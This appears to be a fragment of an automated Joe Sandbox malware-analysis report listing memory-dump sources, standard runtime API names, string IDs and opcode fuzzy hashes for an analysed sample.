                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 3480331319-1018135373
                                                                  • Opcode ID: 45b1f9a81fae90e04dd4b60e630f0101097d34ac03d0c418348944ccad6ab8ab
                                                                  • Instruction ID: 32ae08fb0a3ed8cc6e6e46bc7bf67434cdac4899d81cd5cccdbe3c7379699a96
                                                                  • Opcode Fuzzy Hash: 45b1f9a81fae90e04dd4b60e630f0101097d34ac03d0c418348944ccad6ab8ab
                                                                  • Instruction Fuzzy Hash: B141A074E002089BCF10EF69C881ADE7BB0BF45314F14C06FE919AB392D7399A11CB99
                                                                  APIs
                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0047D187
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: EncodePointer
                                                                  • String ID: MOC$RCC
                                                                  • API String ID: 2118026453-2084237596
                                                                  • Opcode ID: 70de8f90f5bd1f5b8ab6bb5a28bcc65908622b4980e6186925452983690d9dd0
                                                                  • Instruction ID: 4d40256b24f812c24450112d631dbd63ea5f3df71b0bb5c8a31356be60f590e6
                                                                  • Opcode Fuzzy Hash: 70de8f90f5bd1f5b8ab6bb5a28bcc65908622b4980e6186925452983690d9dd0
                                                                  • Instruction Fuzzy Hash: C1414771D00209AFCF15DF98CD81AEEBBB5AF49304F1481AAFA08A7212D3399951DB94
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: char_traitscodecvt
                                                                  • String ID:
                                                                  • API String ID: 1910604377-3916222277
                                                                  • Opcode ID: 5abc7e43ed70ce1aac75992c36b166b220829c2b5d9a484e524e6a915f7d5d73
                                                                  • Instruction ID: 89af5196627bd80cb0d10ecdeac339eb1cc7a2b652308b4a356268a6a59eaf21
                                                                  • Opcode Fuzzy Hash: 5abc7e43ed70ce1aac75992c36b166b220829c2b5d9a484e524e6a915f7d5d73
                                                                  • Instruction Fuzzy Hash: DA319A70D00609EFCB24CFA4C598AEEB7B5AF45300F24C09AD41A6B341D7B8AE06DB59